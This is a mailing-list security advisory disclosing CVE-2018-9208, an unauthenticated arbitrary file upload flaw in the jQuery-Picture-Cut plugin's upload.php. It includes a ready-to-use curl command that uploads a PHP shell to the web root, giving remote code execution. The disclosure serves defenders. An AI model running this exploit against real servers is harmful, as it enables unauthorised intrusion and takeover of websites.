oss-sec mailing list archives
Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 20 Nov 2018 17:05:41 -0500
Title: Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta Author: Larry W. Cashdollar, @_larry0 Date: 2018-11-02 CVE-ID:CVE-2018-9208 CWE: CWE-434 arbitrary file upload Download Site: https://github.com/TuyoshiVinicius/jQuery-Picture-Cut Vendor: http://picturecut.tuyoshi.com.br/ Vendor Notified: 2018-11-03 Vendor Contact: tuyoshi_vinicius () hotmail com Advisory: http://www.vapidlabs.com/advisory.php?v=207 Description: picture cut is a jquery plugin that handles images in a very friendly and simple way, with a beautiful interface based on bootstrap or jquery ui, has great features like ajax upload, drag image from explorer, image crop and others. Vulnerability: The code in jQuery-Picture-Cut/src/php/upload.php that calls ../core/PictureCut.php to handle the file upload does not check file type and allows the user to choose the file location path. An unauthenticated user and upload an executable PHP file to the server allowing code execution. Exploit Code: 1. curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@shell.php" http://example.com/jQuery-Picture-Cut/src/php/upload.php 3. With folderOnServer=/ the shell will be in the main web directory path.
Current thread:
- Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta Larry W. Cashdollar (Nov 20)